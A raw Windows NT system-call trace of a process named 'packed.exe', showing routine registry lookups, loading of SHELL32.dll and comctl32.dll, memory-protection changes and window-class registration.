 01601   748   NtQueryValueKey  (192,  (192, "Signature", Partial, 144, ... TitleIdx=0, Type=1, Data="C\0l\0i\0e\0n\0t\0 \0U\0r\0l\0C\0a\0c\0h\0e\0 \0M\0M\0F\0 \0V\0e\0r\0 \05\0.\02\0\0\0"}, 68, ) , Partial, 144, ... TitleIdx=0, Type=1, Data= (192, "Signature", Partial, 144, ... TitleIdx=0, Type=1, Data="C\0l\0i\0e\0n\0t\0 \0U\0r\0l\0C\0a\0c\0h\0e\0 \0M\0M\0F\0 \0V\0e\0r\0 \05\0.\02\0\0\0"}, 68, ) }, 68, ) == 0x0
 01602   748   NtClose  (192, ... ) == 0x0
 01603   748   NtOpenKey  (0xf, {24, 188, 0x40, 0, 0,  (0xf, {24, 188, 0x40, 0, 0, "Content"}, ... 192, ) }, ... 192, ) == 0x0
 01604   748   NtQueryValueKey  (192,  (192, "PerUserItem", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01605   748   NtOpenKey  (0xf, {24, 184, 0x40, 0, 0,  (0xf, {24, 184, 0x40, 0, 0, "Content"}, ... 196, ) }, ... 196, ) == 0x0
 01606   748   NtQueryValueKey  (196,  (196, "PerUserItem", Partial, 144, ... TitleIdx=0, Type=4, Data="\1\0\0\0"}, 16, ) , Partial, 144, ... TitleIdx=0, Type=4, Data= (196, "PerUserItem", Partial, 144, ... TitleIdx=0, Type=4, Data="\1\0\0\0"}, 16, ) }, 16, ) == 0x0
 01607   748   NtClose  (196, ... ) == 0x0
 01608   748   NtClose  (192, ... ) == 0x0
 01609   748   NtOpenKey  (0xf, {24, 188, 0x40, 0, 0,  (0xf, {24, 188, 0x40, 0, 0, "Content"}, ... 192, ) }, ... 192, ) == 0x0
 01610   748   NtOpenSection  (0xe, {24, 8, 0x40, 0, 0,  (0xe, {24, 8, 0x40, 0, 0, "SHELL32.dll"}, ... 196, ) }, ... 196, ) == 0x0
 01611   748   NtMapViewOfSection  (196, -1, (0x0), 0, 0, 0x0, 0, 1, 0, 4, ... (0x7c9c0000), 0x0, 8482816, ) == 0x0
 01612   748   NtClose  (196, ... ) == 0x0
 01613   748   NtProtectVirtualMemory  (-1, (0x7c9c1000), 4476, 4, ... (0x7c9c1000), 8192, 32, ) == 0x0
 01614   748   NtProtectVirtualMemory  (-1, (0x7c9c1000), 8192, 32, ... (0x7c9c1000), 8192, 4, ) == 0x0
 01615   748   NtFlushInstructionCache  (-1, 2090602496, 4476, ... ) == 0x0
 01616   748   NtProtectVirtualMemory  (-1, (0x7c9c1000), 4476, 4, ... (0x7c9c1000), 8192, 32, ) == 0x0
 01617   748   NtProtectVirtualMemory  (-1, (0x7c9c1000), 8192, 32, ... (0x7c9c1000), 8192, 4, ) == 0x0
 01618   748   NtFlushInstructionCache  (-1, 2090602496, 4476, ... ) == 0x0
 01619   748   NtProtectVirtualMemory  (-1, (0x7c9c1000), 4476, 4, ... (0x7c9c1000), 8192, 32, ) == 0x0
 01620   748   NtProtectVirtualMemory  (-1, (0x7c9c1000), 8192, 32, ... (0x7c9c1000), 8192, 4, ) == 0x0
 01621   748   NtFlushInstructionCache  (-1, 2090602496, 4476, ... ) == 0x0
 01622   748   NtProtectVirtualMemory  (-1, (0x7c9c1000), 4476, 4, ... (0x7c9c1000), 8192, 32, ) == 0x0
 01623   748   NtProtectVirtualMemory  (-1, (0x7c9c1000), 8192, 32, ... (0x7c9c1000), 8192, 4, ) == 0x0
 01624   748   NtFlushInstructionCache  (-1, 2090602496, 4476, ... ) == 0x0
 01625   748   NtProtectVirtualMemory  (-1, (0x7c9c1000), 4476, 4, ... (0x7c9c1000), 8192, 32, ) == 0x0
 01626   748   NtProtectVirtualMemory  (-1, (0x7c9c1000), 8192, 32, ... (0x7c9c1000), 8192, 4, ) == 0x0
 01627   748   NtFlushInstructionCache  (-1, 2090602496, 4476, ... ) == 0x0
 01628   748   NtProtectVirtualMemory  (-1, (0x7c9c1000), 4476, 4, ... (0x7c9c1000), 8192, 32, ) == 0x0
 01629   748   NtProtectVirtualMemory  (-1, (0x7c9c1000), 8192, 32, ... (0x7c9c1000), 8192, 4, ) == 0x0
 01630   748   NtFlushInstructionCache  (-1, 2090602496, 4476, ... ) == 0x0
 01631   748   NtProtectVirtualMemory  (-1, (0x7c9c1000), 4476, 4, ... (0x7c9c1000), 8192, 32, ) == 0x0
 01632   748   NtProtectVirtualMemory  (-1, (0x7c9c1000), 8192, 32, ... (0x7c9c1000), 8192, 4, ) == 0x0
 01633   748   NtFlushInstructionCache  (-1, 2090602496, 4476, ... ) == 0x0
 01634   748   NtProtectVirtualMemory  (-1, (0x7c9c1000), 4476, 4, ... (0x7c9c1000), 8192, 32, ) == 0x0
 01635   748   NtProtectVirtualMemory  (-1, (0x7c9c1000), 8192, 32, ... (0x7c9c1000), 8192, 4, ) == 0x0
 01636   748   NtFlushInstructionCache  (-1, 2090602496, 4476, ... ) == 0x0
 01637   748   NtOpenKey  (0x80000000, {24, 0, 0x40, 0, 0,  (0x80000000, {24, 0, 0x40, 0, 0, "\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SHELL32.dll"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01638   748   NtOpenKey  (0x1, {24, 16, 0x40, 0, 0,  (0x1, {24, 16, 0x40, 0, 0, "SYSTEM\Setup"}, ... 196, ) }, ... 196, ) == 0x0
 01639   748   NtQueryValueKey  (196,  (196, "SystemSetupInProgress", Partial, 144, ... TitleIdx=0, Type=4, Data="\0\0\0\0"}, 16, ) , Partial, 144, ... TitleIdx=0, Type=4, Data= (196, "SystemSetupInProgress", Partial, 144, ... TitleIdx=0, Type=4, Data="\0\0\0\0"}, 16, ) }, 16, ) == 0x0
 01640   748   NtClose  (196, ... ) == 0x0
 01641   748   NtQueryDefaultUILanguage  (1236400, ...
 01642   748   NtOpenThreadTokenEx  (-2, 0x20008, 1, 512, ... ) == STATUS_NO_TOKEN
 01643   748   NtOpenProcessTokenEx  (-1, 0x20008, 512, ... -2147482740, ) == 0x0
 01644   748   NtQueryInformationToken  (-2147482740, User, 80, ... {token info, class 1, size 36}, 36, ) == 0x0
 01645   748   NtClose  (-2147482740, ... ) == 0x0
 01646   748   NtOpenKey  (0x2000000, {24, 0, 0x640, 0, 0,  (0x2000000, {24, 0, 0x640, 0, 0, "\REGISTRY\USER\S-1-5-21-1292428093-1383384898-725345543-1003"}, ... -2147482740, ) }, ... -2147482740, ) == 0x0
 01647   748   NtOpenKey  (0x80000000, {24, -2147482740, 0x240, 0, 0,  (0x80000000, {24, -2147482740, 0x240, 0, 0, "Software\Policies\Microsoft\Control Panel\Desktop"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01648   748   NtOpenKey  (0x80000000, {24, -2147482740, 0x640, 0, 0,  (0x80000000, {24, -2147482740, 0x640, 0, 0, "Control Panel\Desktop"}, ... -2147481356, ) }, ... -2147481356, ) == 0x0
 01649   748   NtQueryValueKey  (-2147481356,  (-2147481356, "MultiUILanguageId", Partial, 256, ... ) , Partial, 256, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01650   748   NtClose  (-2147481356, ... ) == 0x0
 01651   748   NtClose  (-2147482740, ... ) == 0x0
 01641   748   NtQueryDefaultUILanguage  ... ) == 0x0
 01652   748   NtOpenFile  (0x1200a9, {24, 0, 0x40, 0, 0,  (0x1200a9, {24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\system32\SHELL32.dll"}, 1, 96, ... 196, {status=0x0, info=1}, ) }, 1, 96, ... 196, {status=0x0, info=1}, ) == 0x0
 01653   748   NtCreateSection  (0x4, 0x0, 0x0, 2, 134217728, 196, ... 200, ) == 0x0
 01654   748   NtMapViewOfSection  (200, -1, (0x0), 0, 0, 0x0, 0, 1, 0, 2, ... (0x1000000), 0x0, 8462336, ) == 0x0
 01655   748   NtOpenFile  (0x1200a9, {24, 0, 0x40, 0, 0,  (0x1200a9, {24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\system32\SHELL32.dll.124.Manifest"}, 1, 96, ... ) }, 1, 96, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01656   748   NtQueryDefaultLocale  (1, 1234496, ... ) == 0x0
 01657   748   NtOpenFile  (0x1200a9, {24, 0, 0x40, 0, 0,  (0x1200a9, {24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\system32\SHELL32.dll.124.Config"}, 1, 96, ... ) }, 1, 96, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01658   748   NtRequestWaitReplyPort  (24, {128, 156, new_msg, 0, 2088850039, 1235532, 1179817, 1235256}  (24, {128, 156, new_msg, 0, 2088850039, 1235532, 1179817, 1235256} "\210\6\31\1\33\0\1\0`\0\0\0\0\0\0\0\1\0\0\0\0\0\11\4\1\1\1\0>\0@\0\250\6\31\1\304\0\0\0\377\377\377\377\0\0\0\0@ #\1\0\0\0\0\236\2\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0(\0,\0\350\6\31\1\0\0\0\0\0\0\0\0@\336\22\0\0\0\0\0" ... {128, 156, reply, 0, 484, 748, 58560, 0} "\300\270\26\0\33\0\1\0\0\0\0\0\0\0\0\0\1\0\0\0\0\0\11\4\1\1\1\0>\0@\0\250\6\31\1\304\0\0\0\377\377\377\377\0\0\0\0@ #\1\0\0\0\0\236\2\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0(\0,\0\350\6\31\1\0\0\0\0\0\0\0\0@\336\22\0\0\0\0\0" )  ... {128, 156, reply, 0, 484, 748, 58560, 0}  (24, {128, 156, new_msg, 0, 2088850039, 1235532, 1179817, 1235256} "\210\6\31\1\33\0\1\0`\0\0\0\0\0\0\0\1\0\0\0\0\0\11\4\1\1\1\0>\0@\0\250\6\31\1\304\0\0\0\377\377\377\377\0\0\0\0@ #\1\0\0\0\0\236\2\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0(\0,\0\350\6\31\1\0\0\0\0\0\0\0\0@\336\22\0\0\0\0\0" ... {128, 156, reply, 0, 484, 748, 58560, 0} "\300\270\26\0\33\0\1\0\0\0\0\0\0\0\0\0\1\0\0\0\0\0\11\4\1\1\1\0>\0@\0\250\6\31\1\304\0\0\0\377\377\377\377\0\0\0\0@ #\1\0\0\0\0\236\2\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0(\0,\0\350\6\31\1\0\0\0\0\0\0\0\0@\336\22\0\0\0\0\0" )  ) == 0x0
 01659   748   NtClose  (196, ... ) == 0x0
 01660   748   NtClose  (200, ... ) == 0x0
 01661   748   NtUnmapViewOfSection  (-1, 0x1000000, ... ) == 0x0
 01662   748   NtQueryDebugFilterState  (53, 2, ... ) == 0x0
 01663   748   NtOpenKey  (0x8, {24, 0, 0x40, 0, 0,  (0x8, {24, 0, 0x40, 0, 0, "\Registry\Machine\Software\Microsoft\Windows\CurrentVersion\SideBySide\AssemblyStorageRoots"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01664   748   NtQueryDebugFilterState  (53, 2, ... ) == 0x0
 01665   748   NtQueryDebugFilterState  (53, 2, ... ) == 0x0
 01666   748   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\u:\work\packed.exe.Local\"}, 1233688, ... ) }, 1233688, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01667   748   NtQueryDebugFilterState  (53, 2, ... ) == 0x0
 01668   748   NtQueryDebugFilterState  (53, 2, ... ) == 0x0
 01669   748   NtQueryDebugFilterState  (53, 2, ... ) == 0x0
 01670   748   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.2982_x-ww_ac3f9c03"}, 1233752, ... ) }, 1233752, ... ) == 0x0
 01671   748   NtOpenFile  (0x100020, {24, 0, 0x40, 0, 0,  (0x100020, {24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.2982_x-ww_ac3f9c03"}, 3, 33, ... 200, {status=0x0, info=1}, ) }, 3, 33, ... 200, {status=0x0, info=1}, ) == 0x0
 01672   748   NtQueryDebugFilterState  (53, 2, ... ) == 0x0
 01673   748   NtOpenSection  (0xe, {24, 8, 0x40, 0, 0,  (0xe, {24, 8, 0x40, 0, 0, "comctl32.dll"}, ... 196, ) }, ... 196, ) == 0x0
 01674   748   NtMapViewOfSection  (196, -1, (0x0), 0, 0, 0x0, 0, 1, 0, 4, ... (0x5d090000), 0x0, 630784, ) == 0x0
 01675   748   NtClose  (196, ... ) == 0x0
 01676   748   NtProtectVirtualMemory  (-1, (0x5d091000), 1656, 4, ... (0x5d091000), 4096, 32, ) == 0x0
 01677   748   NtProtectVirtualMemory  (-1, (0x5d091000), 4096, 32, ... (0x5d091000), 4096, 4, ) == 0x0
 01678   748   NtFlushInstructionCache  (-1, 1560875008, 1656, ... ) == 0x0
 01679   748   NtProtectVirtualMemory  (-1, (0x5d091000), 1656, 4, ... (0x5d091000), 4096, 32, ) == 0x0
 01680   748   NtProtectVirtualMemory  (-1, (0x5d091000), 4096, 32, ... (0x5d091000), 4096, 4, ) == 0x0
 01681   748   NtFlushInstructionCache  (-1, 1560875008, 1656, ... ) == 0x0
 01682   748   NtProtectVirtualMemory  (-1, (0x5d091000), 1656, 4, ... (0x5d091000), 4096, 32, ) == 0x0
 01683   748   NtProtectVirtualMemory  (-1, (0x5d091000), 4096, 32, ... (0x5d091000), 4096, 4, ) == 0x0
 01684   748   NtFlushInstructionCache  (-1, 1560875008, 1656, ... ) == 0x0
 01685   748   NtProtectVirtualMemory  (-1, (0x5d091000), 1656, 4, ... (0x5d091000), 4096, 32, ) == 0x0
 01686   748   NtProtectVirtualMemory  (-1, (0x5d091000), 4096, 32, ... (0x5d091000), 4096, 4, ) == 0x0
 01687   748   NtFlushInstructionCache  (-1, 1560875008, 1656, ... ) == 0x0
 01688   748   NtProtectVirtualMemory  (-1, (0x5d091000), 1656, 4, ... (0x5d091000), 4096, 32, ) == 0x0
 01689   748   NtProtectVirtualMemory  (-1, (0x5d091000), 4096, 32, ... (0x5d091000), 4096, 4, ) == 0x0
 01690   748   NtFlushInstructionCache  (-1, 1560875008, 1656, ... ) == 0x0
 01691   748   NtOpenKey  (0x80000000, {24, 0, 0x40, 0, 0,  (0x80000000, {24, 0, 0x40, 0, 0, "\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\comctl32.dll"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01692   748   NtQuerySystemInformation  (Basic, 44, ... {Unknown=0,MaximumIncrement=156250,PhysicalPageSize=0x1000,NumberOfPhysicalPages=0xff7c,LowestPhysicalPage=0x1,HighestPhysicalPage=0xffff,AllocationGranularity=0x10000,LowestUserAddress=0x10000,HighestUserAddress=0x7ffeffff,ActiveProcessors=1,NumberProcessors=1,}, 0x0, ) == 0x0
 01693   748   NtAllocateVirtualMemory  (-1, 0, 0, 65536, 8192, 4, ... 16777216, 65536, ) == 0x0
 01694   748   NtAllocateVirtualMemory  (-1, 16777216, 0, 4096, 4096, 4, ... 16777216, 4096, ) == 0x0
 01695   748   NtAllocateVirtualMemory  (-1, 16781312, 0, 8192, 4096, 4, ... 16781312, 8192, ) == 0x0
 01696   748   NtAllocateVirtualMemory  (-1, 16789504, 0, 4096, 4096, 4, ... 16789504, 4096, ) == 0x0
 01697   748   NtAllocateVirtualMemory  (-1, 16793600, 0, 4096, 4096, 4, ... 16793600, 4096, ) == 0x0
 01698   748   NtQueryDefaultUILanguage  (1234528, ...
 01699   748   NtOpenThreadTokenEx  (-2, 0x20008, 1, 512, ... ) == STATUS_NO_TOKEN
 01700   748   NtOpenProcessTokenEx  (-1, 0x20008, 512, ... -2147482740, ) == 0x0
 01701   748   NtQueryInformationToken  (-2147482740, User, 80, ... {token info, class 1, size 36}, 36, ) == 0x0
 01702   748   NtClose  (-2147482740, ... ) == 0x0
 01703   748   NtOpenKey  (0x2000000, {24, 0, 0x640, 0, 0,  (0x2000000, {24, 0, 0x640, 0, 0, "\REGISTRY\USER\S-1-5-21-1292428093-1383384898-725345543-1003"}, ... -2147482740, ) }, ... -2147482740, ) == 0x0
 01704   748   NtOpenKey  (0x80000000, {24, -2147482740, 0x240, 0, 0,  (0x80000000, {24, -2147482740, 0x240, 0, 0, "Software\Policies\Microsoft\Control Panel\Desktop"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01705   748   NtOpenKey  (0x80000000, {24, -2147482740, 0x640, 0, 0,  (0x80000000, {24, -2147482740, 0x640, 0, 0, "Control Panel\Desktop"}, ... -2147481356, ) }, ... -2147481356, ) == 0x0
 01706   748   NtQueryValueKey  (-2147481356,  (-2147481356, "MultiUILanguageId", Partial, 256, ... ) , Partial, 256, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01707   748   NtClose  (-2147481356, ... ) == 0x0
 01708   748   NtClose  (-2147482740, ... ) == 0x0
 01698   748   NtQueryDefaultUILanguage  ... ) == 0x0
 01709   748   NtOpenFile  (0x1200a9, {24, 0, 0x40, 0, 0,  (0x1200a9, {24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\system32\comctl32.dll"}, 1, 96, ... 196, {status=0x0, info=1}, ) }, 1, 96, ... 196, {status=0x0, info=1}, ) == 0x0
 01710   748   NtCreateSection  (0x4, 0x0, 0x0, 2, 134217728, 196, ... 204, ) == 0x0
 01711   748   NtMapViewOfSection  (204, -1, (0x0), 0, 0, 0x0, 0, 1, 0, 2, ... (0x1010000), 0x0, 618496, ) == 0x0
 01712   748   NtOpenFile  (0x1200a9, {24, 0, 0x40, 0, 0,  (0x1200a9, {24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\system32\comctl32.dll.124.Manifest"}, 1, 96, ... ) }, 1, 96, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01713   748   NtQueryDefaultLocale  (1, 1232624, ... ) == 0x0
 01714   748   NtOpenFile  (0x1200a9, {24, 0, 0x40, 0, 0,  (0x1200a9, {24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\system32\comctl32.dll.124.Config"}, 1, 96, ... ) }, 1, 96, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01715   748   NtRequestWaitReplyPort  (24, {128, 156, new_msg, 0, 2088850039, 1233660, 1179817, 1233384}  (24, {128, 156, new_msg, 0, 2088850039, 1233660, 1179817, 1233384} "\210\6\31\1\33\0\1\0`\0\0\0\0\0\0\0\1\0\0\0\0\0\11\4\1\1\1\0@\0D\0\250\6\31\1\304\0\0\0\377\377\377\377\0\0\0\0\340q\10\1\0\0\0\0k\10\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0(\0,\0\354\6\31\1\0\0\0\0\0\0\0\0\360\326\22\0\0\0\0\0" ... {128, 156, reply, 0, 484, 748, 58561, 0} "\300\270\26\0\33\0\1\0\0\0\0\0\0\0\0\0\1\0\0\0\0\0\11\4\1\1\1\0@\0D\0\250\6\31\1\304\0\0\0\377\377\377\377\0\0\0\0\340q\10\1\0\0\0\0k\10\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0(\0,\0\354\6\31\1\0\0\0\0\0\0\0\0\360\326\22\0\0\0\0\0" )  ... {128, 156, reply, 0, 484, 748, 58561, 0}  (24, {128, 156, new_msg, 0, 2088850039, 1233660, 1179817, 1233384} "\210\6\31\1\33\0\1\0`\0\0\0\0\0\0\0\1\0\0\0\0\0\11\4\1\1\1\0@\0D\0\250\6\31\1\304\0\0\0\377\377\377\377\0\0\0\0\340q\10\1\0\0\0\0k\10\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0(\0,\0\354\6\31\1\0\0\0\0\0\0\0\0\360\326\22\0\0\0\0\0" ... {128, 156, reply, 0, 484, 748, 58561, 0} "\300\270\26\0\33\0\1\0\0\0\0\0\0\0\0\0\1\0\0\0\0\0\11\4\1\1\1\0@\0D\0\250\6\31\1\304\0\0\0\377\377\377\377\0\0\0\0\340q\10\1\0\0\0\0k\10\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0(\0,\0\354\6\31\1\0\0\0\0\0\0\0\0\360\326\22\0\0\0\0\0" )  ) == 0x0
 01716   748   NtClose  (196, ... ) == 0x0
 01717   748   NtClose  (204, ... ) == 0x0
 01718   748   NtUnmapViewOfSection  (-1, 0x1010000, ... ) == 0x0
 01719   748   NtQueryDebugFilterState  (53, 2, ... ) == 0x0
 01720   748   NtAllocateVirtualMemory  (-1, 1388544, 0, 4096, 4096, 4, ... 1388544, 4096, ) == 0x0
 01721   748   NtOpenProcess  (0x400, {24, 0, 0x0, 0, 0, 0x0}, {484, 0}, ... 204, ) == 0x0
 01722   748   NtQueryInformationProcess  (204, Session, 4, ... {SessionId=0,}, 0x0, ) == 0x0
 01723   748   NtClose  (204, ... ) == 0x0
 01724   748   NtUserRegisterWindowMessage  ( ("ShellGetDragImage", ... ) , ... ) == 0xc03a
 01725   748   NtUserSystemParametersInfo  (104, 0, 1561338260, 0, ... ) == 0x1
 01726   748   NtUserSystemParametersInfo  (38, 4, 1561337988, 0, ... ) == 0x1
 01727   748   NtOpenThreadTokenEx  (-2, 0x20008, 1, 512, ... ) == STATUS_NO_TOKEN
 01728   748   NtOpenProcessTokenEx  (-1, 0x20008, 512, ... 204, ) == 0x0
 01729   748   NtQueryInformationToken  (204, User, 80, ... {token info, class 1, size 36}, 36, ) == 0x0
 01730   748   NtClose  (204, ... ) == 0x0
 01731   748   NtOpenKey  (0x20019, {24, 0, 0x640, 0, 0,  (0x20019, {24, 0, 0x640, 0, 0, "\REGISTRY\USER\S-1-5-21-1292428093-1383384898-725345543-1003"}, ... 204, ) }, ... 204, ) == 0x0
 01732   748   NtOpenProcessToken  (-1, 0x8, ... 196, ) == 0x0
 01733   748   NtAccessCheck  (1382048, 196, 0x1, 1235720, 1235772, 56, 1235752, ... ) == STATUS_NO_IMPERSONATION_TOKEN
 01734   748   NtClose  (196, ... ) == 0x0
 01735   748   NtOpenKey  (0x20019, {24, 204, 0x40, 0, 0,  (0x20019, {24, 204, 0x40, 0, 0, "Control Panel\Desktop"}, ... 196, ) }, ... 196, ) == 0x0
 01736   748   NtQueryValueKey  (196,  (196, "SmoothScroll", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01737   748   NtClose  (196, ... ) == 0x0
 01738   748   NtUserSystemParametersInfo  (41, 500, 1235900, 0, ... ) == 0x1
 01739   748   NtUserSystemParametersInfo  (102, 0, 1561338280, 0, ... ) == 0x1
 01740   748   NtClose  (204, ... ) == 0x0
 01741   748   NtUserFindExistingCursorIcon  (1235652, 1235668, 1235716, ... ) == 0x10011
 01742   748   NtUserRegisterClassExWOW  (1235596, 1235664, 1235680, 1235696, 0, 384, 0, ... ) == 0x8174c03b
 01743   748   NtUserRegisterClassExWOW  (1235596, 1235664, 1235680, 1235696, 0, 384, 0, ... ) == 0x8174c03d
 01744   748   NtUserFindExistingCursorIcon  (1235652, 1235668, 1235716, ... ) == 0x10011
 01745   748   NtUserRegisterClassExWOW  (1235596, 1235664, 1235680, 1235696, 0, 384, 0, ... ) == 0x8174c03f
 01746   748   NtUserFindExistingCursorIcon  (1235652, 1235668, 1235716, ... ) == 0x10011
 01747   748   NtUserRegisterClassExWOW  (1235596, 1235664, 1235680, 1235696, 0, 384, 0, ... ) == 0x8174c041
 01748   748   NtUserFindExistingCursorIcon  (1235652, 1235668, 1235716, ... ) == 0x10011
 01749   748   NtUserRegisterClassExWOW  (1235596, 1235664, 1235680, 1235696, 0, 384, 0, ... ) == 0x8174c043
 01750   748   NtUserRegisterClassExWOW  (1235596, 1235664, 1235680, 1235696, 0, 384, 0, ... ) == 0x8174c045
 01751   748   NtUserFindExistingCursorIcon  (1235652, 1235668, 1235716, ... ) == 0x10011
 01752   748   NtUserRegisterClassExWOW  (1235596, 1235664, 1235680, 1235696, 0, 384, 0, ... ) == 0x8174c047
 01753   748   NtUserFindExistingCursorIcon  (1235652, 1235668, 1235716, ... ) == 0x10011
 01754   748   NtUserRegisterClassExWOW  (1235596, 1235664, 1235680, 1235696, 0, 384, 0, ... ) == 0x8174c049
 01755   748   NtUserFindExistingCursorIcon  (1235652, 1235668, 1235716, ... ) == 0x10011
 01756   748   NtUserRegisterClassExWOW  (1235596, 1235664, 1235680, 1235696, 0, 384, 0, ... ) == 0x8174c04b
 01757   748   NtUserFindExistingCursorIcon  (1235652, 1235668, 1235716, ... ) == 0x10011
 01758   748   NtUserRegisterClassExWOW  (1235596, 1235664, 1235680, 1235696, 0, 384, 0, ... ) == 0x8174c04d
 01759   748   NtUserFindExistingCursorIcon  (1235652, 1235668, 1235716, ... ) == 0x10011
 01760   748   NtUserRegisterClassExWOW  (1235596, 1235664, 1235680, 1235696, 0, 384, 0, ... ) == 0x8174c04f
 01761   748   NtUserRegisterClassExWOW  (1235596, 1235664, 1235680, 1235696, 0, 384, 0, ... ) == 0x8174c051
 01762   748   NtUserFindExistingCursorIcon  (1235652, 1235668, 1235716, ... ) == 0x10011
 01763   748   NtUserRegisterClassExWOW  (1235596, 1235664, 1235680, 1235696, 0, 384, 0, ... ) == 0x8174c053
 01764   748   NtUserFindExistingCursorIcon  (1235648, 1235664, 1235712, ... ) == 0x10011
 01765   748   NtUserRegisterClassExWOW  (1235592, 1235660, 1235676, 1235692, 0, 384, 0, ... ) == 0x8174c055
 01766   748   NtUserFindExistingCursorIcon  (1235648, 1235664, 1235712, ... ) == 0x10011
 01767   748   NtUserRegisterClassExWOW  (1235592, 1235660, 1235676, 1235692, 0, 384, 0, ... ) == 0x8174c057
 01768   748   NtUserFindExistingCursorIcon  (1235652, 1235668, 1235716, ... ) == 0x10011
 01769   748   NtUserRegisterClassExWOW  (1235596, 1235664, 1235680, 1235696, 0, 384, 0, ... ) == 0x8174c059
 01770   748   NtUserFindExistingCursorIcon  (1235652, 1235668, 1235716, ... ) == 0x10013
 01771   748   NtUserRegisterClassExWOW  (1235596, 1235664, 1235680, 1235696, 0, 384, 0, ... ) == 0x8174c05b
 01772   748   NtUserFindExistingCursorIcon  (1235652, 1235668, 1235716, ... ) == 0x10011
 01773   748   NtUserRegisterClassExWOW  (1235596, 1235664, 1235680, 1235696, 0, 384, 0, ... ) == 0x8174c05d
 01774   748   NtUserFindExistingCursorIcon  (1235652, 1235668, 1235716, ... ) == 0x10011
 01775   748   NtUserRegisterClassExWOW  (1235596, 1235664, 1235680, 1235696, 0, 384, 0, ... ) == 0x8174c05f
 01776   748   NtOpenThreadToken  (-2, 0xc, 1, ... ) == STATUS_NO_TOKEN
 01777   748   NtCreateSemaphore  (0x1f0003, {24, 48, 0x80, 1376224, 0,  (0x1f0003, {24, 48, 0x80, 1376224, 0, "shell.{210A4BA0-3AEA-1069-A2D9-08002B30309D}"}, 0, 2147483647, ... 204, ) }, 0, 2147483647, ... 204, ) == STATUS_OBJECT_NAME_EXISTS
 01778   748   NtReleaseSemaphore  (204, 1, ... 0, ) == 0x0
 01779   748   NtWaitForSingleObject  (204, 0, {0, 0}, ... ) == 0x0
 01780   748   NtCreateKey  (0x2000000, {24, 56, 0x40, 0, 0,  (0x2000000, {24, 56, 0x40, 0, 0, "Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders"}, 0, 0x0, 0, ... 196, 2, ) }, 0, 0x0, 0, ... 196, 2, ) == 0x0
 01781   748   NtQueryValueKey  (196,  (196, "Cache", Partial, 144, ... TitleIdx=0, Type=2, Data="%\0U\0S\0E\0R\0P\0R\0O\0F\0I\0L\0E\0%\0\\0L\0o\0c\0a\0l\0 \0S\0e\0t\0t\0i\0n\0g\0s\0\\0T\0e\0m\0p\0o\0r\0a\0r\0y\0 \0I\0n\0t\0e\0r\0n\0e\0t\0 \0F\0i\0l\0e\0s\0\0\0"}, 120, ) , Partial, 144, ... TitleIdx=0, Type=2, Data= (196, "Cache", Partial, 144, ... TitleIdx=0, Type=2, Data="%\0U\0S\0E\0R\0P\0R\0O\0F\0I\0L\0E\0%\0\\0L\0o\0c\0a\0l\0 \0S\0e\0t\0t\0i\0n\0g\0s\0\\0T\0e\0m\0p\0o\0r\0a\0r\0y\0 \0I\0n\0t\0e\0r\0n\0e\0t\0 \0F\0i\0l\0e\0s\0\0\0"}, 120, ) }, 120, ) == 0x0
 01782   748   NtClose  (196, ... ) == 0x0
